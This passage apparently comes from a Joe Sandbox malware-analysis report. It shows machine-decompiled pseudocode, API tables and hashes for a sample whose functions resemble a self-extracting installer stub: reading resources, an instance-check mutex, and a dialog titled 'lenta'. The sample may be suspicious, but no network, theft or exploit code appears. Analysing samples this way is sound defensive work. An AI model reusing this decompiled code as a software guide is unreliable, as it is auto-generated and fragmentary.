                                                                      • API String ID: 2418873061-2207793050
                                                                      • Opcode ID: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                      • Instruction ID: 3f338fb9d91bad84f49565cd2430b08ce4a6c8a746bf08647728c35d10361278
                                                                      • Opcode Fuzzy Hash: 474633e13c8ba78efb9db3d44d00790c13dd9ebf4df271fe02faed632663cca6
                                                                      • Instruction Fuzzy Hash: 295146307452457BFB21BB359C8DFFB3A5DDB86F64F144029F646961E0CAB88A02B361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E00F82CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t13;
                                                                      				void* _t20;
                                                                      				void* _t23;
                                                                      				void* _t27;
                                                                      				struct HRSRC__* _t31;
                                                                      				intOrPtr _t33;
                                                                      				void* _t43;
                                                                      				void* _t48;
                                                                      				signed int _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				signed int _t67;
                                                                      
                                                                      				_t13 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t13 ^ _t67;
                                                                      				_t65 = 0;
                                                                      				_t66 = __ecx;
                                                                      				_t48 = __edx;
                                                                      				 *0xf89a3c = __ecx;
                                                                      				memset(0xf89140, 0, 0x8fc);
                                                                      				memset(0xf88a20, 0, 0x32c);
                                                                      				memset(0xf888c0, 0, 0x104);
                                                                      				 *0xf893ec = 1;
                                                                      				_t20 = E00F8468F("TITLE", 0xf89154, 0x7f);
                                                                      				if(_t20 == 0 || _t20 > 0x80) {
                                                                      					_t64 = 0x4b1;
                                                                      					goto L32;
                                                                      				} else {
                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                      					 *0xf8858c = _t27;
                                                                      					SetEvent(_t27);
                                                                      					_t64 = 0xf89a34;
                                                                      					if(E00F8468F("EXTRACTOPT", 0xf89a34, 4) != 0) {
                                                                      						if(( *0xf89a34 & 0x000000c0) == 0) {
                                                                      							L12:
                                                                      							 *0xf89120 =  *0xf89120 & _t65;
                                                                      							if(E00F85C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                      								if( *0xf88a3a == 0) {
                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                      									if(_t31 != 0) {
                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                      									}
                                                                      									if( *0xf88184 != 0) {
                                                                      										__imp__#17();
                                                                      									}
                                                                      									if( *0xf88a24 == 0) {
                                                                      										_t57 = _t65;
                                                                      										if(E00F836EE(_t65) == 0) {
                                                                      											goto L33;
                                                                      										} else {
                                                                      											_t33 =  *0xf89a40; // 0x3
                                                                      											_t48 = 1;
                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                      												if(( *0xf89a34 & 0x00000100) == 0 || ( *0xf88a38 & 0x00000001) != 0 || E00F818A3(_t64, _t66) != 0) {
                                                                      													goto L30;
                                                                      												} else {
                                                                      													_t64 = 0x7d6;
                                                                      													if(E00F86517(_t57, 0x7d6, _t34, E00F819E0, 0x547, 0x83e) != 0x83d) {
                                                                      														goto L33;
                                                                      													} else {
                                                                      														goto L30;
                                                                      													}
                                                                      												}
                                                                      											} else {
                                                                      												L30:
                                                                      												_t23 = _t48;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_t23 = 1;
                                                                      									}
                                                                      								} else {
                                                                      									E00F82390(0xf88a3a);
                                                                      									goto L33;
                                                                      								}
                                                                      							} else {
                                                                      								_t64 = 0x520;
                                                                      								L32:
                                                                      								E00F844B9(0, _t64, 0, 0, 0x10, 0);
                                                                      								goto L33;
                                                                      							}
                                                                      						} else {
                                                                      							_t64 =  &_v268;
                                                                      							if(E00F8468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                      								goto L3;
                                                                      							} else {
                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                      								 *0xf88588 = _t43;
                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                      									goto L12;
                                                                      								} else {
                                                                      									if(( *0xf89a34 & 0x00000080) == 0) {
                                                                      										_t64 = 0x524;
                                                                      										if(E00F844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                      											goto L12;
                                                                      										} else {
                                                                      											goto L11;
                                                                      										}
                                                                      									} else {
                                                                      										_t64 = 0x54b;
                                                                      										E00F844B9(0, 0x54b, "lenta", 0, 0x10, 0);
                                                                      										L11:
                                                                      										CloseHandle( *0xf88588);
                                                                      										 *0xf89124 = 0x800700b7;
                                                                      										goto L33;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						L3:
                                                                      						_t64 = 0x4b1;
                                                                      						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						 *0xf89124 = 0x80070714;
                                                                      						L33:
                                                                      						_t23 = 0;
                                                                      					}
                                                                      				}
                                                                      				return E00F86CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                      			}



















                                                                      0x00f82cb5
                                                                      0x00f82cbc
                                                                      0x00f82cc7
                                                                      0x00f82cc9
                                                                      0x00f82cd1
                                                                      0x00f82cd3
                                                                      0x00f82cd9
                                                                      0x00f82ce9
                                                                      0x00f82cf9
                                                                      0x00f82d0e
                                                                      0x00f82d15
                                                                      0x00f82d1c
                                                                      0x00f82ef3
                                                                      0x00000000
                                                                      0x00f82d2d
                                                                      0x00f82d34
                                                                      0x00f82d3b
                                                                      0x00f82d40
                                                                      0x00f82d48
                                                                      0x00f82d59
                                                                      0x00f82d84
                                                                      0x00f82e1f
                                                                      0x00f82e1f
                                                                      0x00f82e2e
                                                                      0x00f82e41
                                                                      0x00f82e5a
                                                                      0x00f82e62
                                                                      0x00f82e6c
                                                                      0x00f82e6c
                                                                      0x00f82e75
                                                                      0x00f82e77
                                                                      0x00f82e77
                                                                      0x00f82e84
                                                                      0x00f82e8b
                                                                      0x00f82e94
                                                                      0x00000000
                                                                      0x00f82e96
                                                                      0x00f82e96
                                                                      0x00f82e9e
                                                                      0x00f82ea2
                                                                      0x00f82eba
                                                                      0x00000000
                                                                      0x00f82ece
                                                                      0x00f82ede
                                                                      0x00f82eed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82eed
                                                                      0x00f82eef
                                                                      0x00f82eef
                                                                      0x00f82eef
                                                                      0x00f82eef
                                                                      0x00f82ea2
                                                                      0x00f82e86
                                                                      0x00f82e88
                                                                      0x00f82e88
                                                                      0x00f82e43
                                                                      0x00f82e48
                                                                      0x00000000
                                                                      0x00f82e48
                                                                      0x00f82e30
                                                                      0x00f82e30
                                                                      0x00f82ef8
                                                                      0x00f82f01
                                                                      0x00000000
                                                                      0x00f82f01
                                                                      0x00f82d8a
                                                                      0x00f82d8f
                                                                      0x00f82da1
                                                                      0x00000000
                                                                      0x00f82da3
                                                                      0x00f82dae
                                                                      0x00f82db4
                                                                      0x00f82dbb
                                                                      0x00000000
                                                                      0x00f82dca
                                                                      0x00f82dd3
                                                                      0x00f82df5
                                                                      0x00f82e02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82dd5
                                                                      0x00f82dde
                                                                      0x00f82de3
                                                                      0x00f82e04
                                                                      0x00f82e0a
                                                                      0x00f82e10
                                                                      0x00000000
                                                                      0x00f82e10
                                                                      0x00f82dd3
                                                                      0x00f82dbb
                                                                      0x00f82da1
                                                                      0x00f82d5b
                                                                      0x00f82d5b
                                                                      0x00f82d5d
                                                                      0x00f82d69
                                                                      0x00f82d6e
                                                                      0x00f82f06
                                                                      0x00f82f06
                                                                      0x00f82f06
                                                                      0x00f82d59
                                                                      0x00f82f18

                                                                      APIs
                                                                      • memset.MSVCRT ref: 00F82CD9
                                                                      • memset.MSVCRT ref: 00F82CE9
                                                                      • memset.MSVCRT ref: 00F82CF9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D34
                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82D40
                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DAE
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00F82DBD
                                                                      • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00F82E0A
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                      • API String ID: 1002816675-2993962200
                                                                      • Opcode ID: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                      • Instruction ID: 22b4253e4d21e9eb6680ff6a7cc74673e86b1f5ffc43ae79a84b2645473fc7d4
                                                                      • Opcode Fuzzy Hash: e705f01ac90e53be520f81ce3d93735e12645956cab5f89d571dda1197a88dce
                                                                      • Instruction Fuzzy Hash: 07510870B443056BEBA4BB708C4ABFB3699EB45760F444029FA41D51D1DBB8EC42FB26
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E00F834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t9;
                                                                      				void* _t12;
                                                                      				void* _t13;
                                                                      				void* _t17;
                                                                      				void* _t23;
                                                                      				void* _t25;
                                                                      				struct HWND__* _t35;
                                                                      				struct HWND__* _t38;
                                                                      				void* _t39;
                                                                      
                                                                      				_t9 = _a8 - 0x10;
                                                                      				if(_t9 == 0) {
                                                                      					__eflags = 1;
                                                                      					L19:
                                                                      					_push(0);
                                                                      					 *0xf891d8 = 1;
                                                                      					L20:
                                                                      					_push(_a4);
                                                                      					L21:
                                                                      					EndDialog();
                                                                      					L22:
                                                                      					return 1;
                                                                      				}
                                                                      				_push(1);
                                                                      				_pop(1);
                                                                      				_t12 = _t9 - 0xf2;
                                                                      				if(_t12 == 0) {
                                                                      					__eflags = _a12 - 0x1b;
                                                                      					if(_a12 != 0x1b) {
                                                                      						goto L22;
                                                                      					}
                                                                      					goto L19;
                                                                      				}
                                                                      				_t13 = _t12 - 0xe;
                                                                      				if(_t13 == 0) {
                                                                      					_t35 = _a4;
                                                                      					 *0xf88584 = _t35;
                                                                      					E00F843D0(_t35, GetDesktopWindow());
                                                                      					__eflags =  *0xf88184; // 0x1
                                                                      					if(__eflags != 0) {
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                      					}
                                                                      					SetWindowTextA(_t35, "lenta");
                                                                      					_t17 = CreateThread(0, 0, E00F84FE0, 0, 0, 0xf88798);
                                                                      					 *0xf8879c = _t17;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						goto L22;
                                                                      					} else {
                                                                      						E00F844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						_push(_t35);
                                                                      						goto L21;
                                                                      					}
                                                                      				}
                                                                      				_t23 = _t13 - 1;
                                                                      				if(_t23 == 0) {
                                                                      					__eflags = _a12 - 2;
                                                                      					if(_a12 != 2) {
                                                                      						goto L22;
                                                                      					}
                                                                      					ResetEvent( *0xf8858c);
                                                                      					_t38 =  *0xf88584; // 0x0
                                                                      					_t25 = E00F844B9(_t38, 0x4b2, 0xf81140, 0, 0x20, 4);
                                                                      					__eflags = _t25 - 6;
                                                                      					if(_t25 == 6) {
                                                                      						L11:
                                                                      						 *0xf891d8 = 1;
                                                                      						SetEvent( *0xf8858c);
                                                                      						_t39 =  *0xf8879c; // 0x0
                                                                      						E00F83680(_t39);
                                                                      						_push(0);
                                                                      						goto L20;
                                                                      					}
                                                                      					__eflags = _t25 - 1;
                                                                      					if(_t25 == 1) {
                                                                      						goto L11;
                                                                      					}
                                                                      					SetEvent( *0xf8858c);
                                                                      					goto L22;
                                                                      				}
                                                                      				if(_t23 == 0xe90) {
                                                                      					TerminateThread( *0xf8879c, 0);
                                                                      					EndDialog(_a4, _a12);
                                                                      					return 1;
                                                                      				}
                                                                      				return 0;
                                                                      			}












                                                                      0x00f834fb
                                                                      0x00f834fe
                                                                      0x00f83665
                                                                      0x00f83666
                                                                      0x00f83666
                                                                      0x00f83668
                                                                      0x00f8366e
                                                                      0x00f8366e
                                                                      0x00f83671
                                                                      0x00f83671
                                                                      0x00f83677
                                                                      0x00000000
                                                                      0x00f83677
                                                                      0x00f83504
                                                                      0x00f83506
                                                                      0x00f83507
                                                                      0x00f8350c
                                                                      0x00f8365b
                                                                      0x00f8365f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83661
                                                                      0x00f83512
                                                                      0x00f83515
                                                                      0x00f835be
                                                                      0x00f835c1
                                                                      0x00f835d1
                                                                      0x00f835d8
                                                                      0x00f835de
                                                                      0x00f835f8
                                                                      0x00f83617
                                                                      0x00f83617
                                                                      0x00f83623
                                                                      0x00f83637
                                                                      0x00f8363d
                                                                      0x00f83642
                                                                      0x00f83644
                                                                      0x00000000
                                                                      0x00f83646
                                                                      0x00f83652
                                                                      0x00f83657
                                                                      0x00f83658
                                                                      0x00000000
                                                                      0x00f83658
                                                                      0x00f83644
                                                                      0x00f8351b
                                                                      0x00f8351d
                                                                      0x00f8354f
                                                                      0x00f83553
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8355f
                                                                      0x00f83565
                                                                      0x00f8357c
                                                                      0x00f83581
                                                                      0x00f83584
                                                                      0x00f8359b
                                                                      0x00f835a1
                                                                      0x00f835a7
                                                                      0x00f835ad
                                                                      0x00f835b3
                                                                      0x00f835b8
                                                                      0x00000000
                                                                      0x00f835b8
                                                                      0x00f83586
                                                                      0x00f83588
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f83590
                                                                      0x00000000
                                                                      0x00f83590
                                                                      0x00f83524
                                                                      0x00f83535
                                                                      0x00f83541
                                                                      0x00000000
                                                                      0x00f83549
                                                                      0x00000000

                                                                      APIs
                                                                      • TerminateThread.KERNEL32(00000000), ref: 00F83535
                                                                      • EndDialog.USER32(?,?), ref: 00F83541
                                                                      • ResetEvent.KERNEL32 ref: 00F8355F
                                                                      • SetEvent.KERNEL32(00F81140,00000000,00000020,00000004), ref: 00F83590
                                                                      • GetDesktopWindow.USER32 ref: 00F835C7
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00F835F1
                                                                      • SendMessageA.USER32(00000000), ref: 00F835F8
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 00F83610
                                                                      • SendMessageA.USER32(00000000), ref: 00F83617
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 00F83623
                                                                      • CreateThread.KERNEL32 ref: 00F83637
                                                                      • EndDialog.USER32(?,00000000), ref: 00F83671
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                      • String ID: lenta
                                                                      • API String ID: 2406144884-2780258678
                                                                      • Opcode ID: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                      • Instruction ID: 7e12baad91acfb759934f752b89e7ee5f16aa0d595d99d976a4aff6c22161b37
                                                                      • Opcode Fuzzy Hash: 143d2f7c301bdbb6a853edd7221c4851ea7bacf22c30148594a65a50a5dad725
                                                                      • Instruction Fuzzy Hash: 6431E431240209BBEB206F28EC4DFFB3A68E785F60F54451AF602952B0DB799911FF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E00F84224(char __ecx) {
                                                                      				char* _v8;
                                                                      				_Unknown_base(*)()* _v12;
                                                                      				_Unknown_base(*)()* _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				char* _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				char _v44;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				_Unknown_base(*)()* _t26;
                                                                      				_Unknown_base(*)()* _t28;
                                                                      				_Unknown_base(*)()* _t29;
                                                                      				_Unknown_base(*)()* _t32;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				char* _t61;
                                                                      				void* _t63;
                                                                      				char* _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				char _t67;
                                                                      				void* _t71;
                                                                      				char _t76;
                                                                      				intOrPtr _t85;
                                                                      
                                                                      				_t67 = __ecx;
                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                      				if(_t66 == 0) {
                                                                      					_t63 = 0x4c2;
                                                                      					L22:
                                                                      					E00F844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                      				_v12 = _t26;
                                                                      				if(_t26 == 0) {
                                                                      					L20:
                                                                      					FreeLibrary(_t66);
                                                                      					_t63 = 0x4c1;
                                                                      					goto L22;
                                                                      				}
                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                      				_v20 = _t28;
                                                                      				if(_t28 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                      				_v16 = _t29;
                                                                      				if(_t29 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t76 =  *0xf888c0; // 0x0
                                                                      				if(_t76 != 0) {
                                                                      					L10:
                                                                      					 *0xf887a0 = 0;
                                                                      					_v52 = _t67;
                                                                      					_v48 = 0;
                                                                      					_v44 = 0;
                                                                      					_v40 = 0xf88598;
                                                                      					_v36 = 1;
                                                                      					_v32 = E00F84200;
                                                                      					_v28 = 0xf888c0;
                                                                      					 *0xf8a288( &_v52);
                                                                      					_t32 =  *_v12();
                                                                      					if(_t71 != _t71) {
                                                                      						asm("int 0x29");
                                                                      					}
                                                                      					_v12 = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						 *0xf8a288(_t32, 0xf888c0);
                                                                      						 *_v16();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						if( *0xf888c0 != 0) {
                                                                      							E00F81680(0xf887a0, 0x104, 0xf888c0);
                                                                      						}
                                                                      						 *0xf8a288(_v12);
                                                                      						 *_v20();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t66);
                                                                      					_t85 =  *0xf887a0; // 0x0
                                                                      					return 0 | _t85 != 0x00000000;
                                                                      				} else {
                                                                      					GetTempPathA(0x104, 0xf888c0);
                                                                      					_t61 = 0xf888c0;
                                                                      					_t4 =  &(_t61[1]); // 0xf888c1
                                                                      					_t65 = _t4;
                                                                      					do {
                                                                      						_t42 =  *_t61;
                                                                      						_t61 =  &(_t61[1]);
                                                                      					} while (_t42 != 0);
                                                                      					_t5 = _t61 - _t65 + 0xf888c0; // 0x1f11181
                                                                      					_t44 = CharPrevA(0xf888c0, _t5);
                                                                      					_v8 = _t44;
                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0xf888c0, _t44)) != 0x3a) {
                                                                      						 *_v8 = 0;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      			}




























                                                                      0x00f84234
                                                                      0x00f8423c
                                                                      0x00f84240
                                                                      0x00f843b2
                                                                      0x00f843b7
                                                                      0x00f843c0
                                                                      0x00000000
                                                                      0x00f843c5
                                                                      0x00f8424c
                                                                      0x00f84252
                                                                      0x00f84257
                                                                      0x00f843a4
                                                                      0x00f843a5
                                                                      0x00f843ab
                                                                      0x00000000
                                                                      0x00f843ab
                                                                      0x00f84263
                                                                      0x00f84269
                                                                      0x00f8426e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8427a
                                                                      0x00f84280
                                                                      0x00f84285
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8428d
                                                                      0x00f84293
                                                                      0x00f842e6
                                                                      0x00f842e9
                                                                      0x00f842ef
                                                                      0x00f842f4
                                                                      0x00f842f7
                                                                      0x00f84300
                                                                      0x00f84307
                                                                      0x00f8430e
                                                                      0x00f84315
                                                                      0x00f8431c
                                                                      0x00f84322
                                                                      0x00f84326
                                                                      0x00f8432d
                                                                      0x00f8432d
                                                                      0x00f8432f
                                                                      0x00f84334
                                                                      0x00f84343
                                                                      0x00f84349
                                                                      0x00f8434d
                                                                      0x00f84354
                                                                      0x00f84354
                                                                      0x00f8435d
                                                                      0x00f8436e
                                                                      0x00f8436e
                                                                      0x00f8437d
                                                                      0x00f84383
                                                                      0x00f84387
                                                                      0x00f8438e
                                                                      0x00f8438e
                                                                      0x00f84387
                                                                      0x00f84391
                                                                      0x00f84399
                                                                      0x00000000
                                                                      0x00f84295
                                                                      0x00f8429f
                                                                      0x00f842a5
                                                                      0x00f842aa
                                                                      0x00f842aa
                                                                      0x00f842ad
                                                                      0x00f842ad
                                                                      0x00f842af
                                                                      0x00f842b0
                                                                      0x00f842b6
                                                                      0x00f842c2
                                                                      0x00f842c8
                                                                      0x00f842ce
                                                                      0x00f842e4
                                                                      0x00f842e4
                                                                      0x00000000
                                                                      0x00f842ce

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00F84236
                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00F8424C
                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00F84263
                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00F8427A
                                                                      • GetTempPathA.KERNEL32(00000104,00F888C0,?,00000001), ref: 00F8429F
                                                                      • CharPrevA.USER32(00F888C0,01F11181,?,00000001), ref: 00F842C2
                                                                      • CharPrevA.USER32(00F888C0,00000000,?,00000001), ref: 00F842D6
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F84391
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00F843A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                      • API String ID: 1865808269-1731843650
                                                                      • Opcode ID: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                      • Instruction ID: ec36900929a26ce360494d6b4fc3a72e5880a3a9b9a6894ef68a5fa7c200beba
                                                                      • Opcode Fuzzy Hash: 0eacf8bf50bc63da9ad49b1c11122efc1d6f9787a3bd8862e687e37578675a1a
                                                                      • Instruction Fuzzy Hash: BB41E374E00209AFE711BF64DC89AFE7BB5EB45394F84016AE941A7251CB749C02FB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00F844B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v64;
                                                                      				char _v576;
                                                                      				void* _v580;
                                                                      				struct HWND__* _v584;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t34;
                                                                      				void* _t37;
                                                                      				signed int _t39;
                                                                      				intOrPtr _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t49;
                                                                      				signed int _t52;
                                                                      				void* _t54;
                                                                      				intOrPtr _t55;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t59;
                                                                      				int _t64;
                                                                      				void* _t66;
                                                                      				intOrPtr* _t67;
                                                                      				signed int _t69;
                                                                      				intOrPtr* _t73;
                                                                      				intOrPtr* _t76;
                                                                      				intOrPtr* _t77;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      				intOrPtr* _t84;
                                                                      				void* _t85;
                                                                      				signed int _t89;
                                                                      
                                                                      				_t75 = __edx;
                                                                      				_t34 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t34 ^ _t89;
                                                                      				_v584 = __ecx;
                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                      				_t67 = _a4;
                                                                      				_t69 = 0xd;
                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                      				_v580 = _t37;
                                                                      				asm("movsb");
                                                                      				if(( *0xf88a38 & 0x00000001) != 0) {
                                                                      					_t39 = 1;
                                                                      				} else {
                                                                      					_v576 = 0;
                                                                      					LoadStringA( *0xf89a3c, _t75,  &_v576, 0x200);
                                                                      					if(_v576 != 0) {
                                                                      						_t73 =  &_v576;
                                                                      						_t16 = _t73 + 1; // 0x1
                                                                      						_t75 = _t16;
                                                                      						do {
                                                                      							_t43 =  *_t73;
                                                                      							_t73 = _t73 + 1;
                                                                      						} while (_t43 != 0);
                                                                      						_t84 = _v580;
                                                                      						_t74 = _t73 - _t75;
                                                                      						if(_t84 == 0) {
                                                                      							if(_t67 == 0) {
                                                                      								_t27 = _t74 + 1; // 0x2
                                                                      								_t83 = _t27;
                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									_t75 = _t83;
                                                                      									_t74 = _t80;
                                                                      									E00F81680(_t80, _t83,  &_v576);
                                                                      									goto L23;
                                                                      								}
                                                                      							} else {
                                                                      								_t76 = _t67;
                                                                      								_t24 = _t76 + 1; // 0x1
                                                                      								_t85 = _t24;
                                                                      								do {
                                                                      									_t55 =  *_t76;
                                                                      									_t76 = _t76 + 1;
                                                                      								} while (_t55 != 0);
                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                      								_t83 = _t25 + _t74;
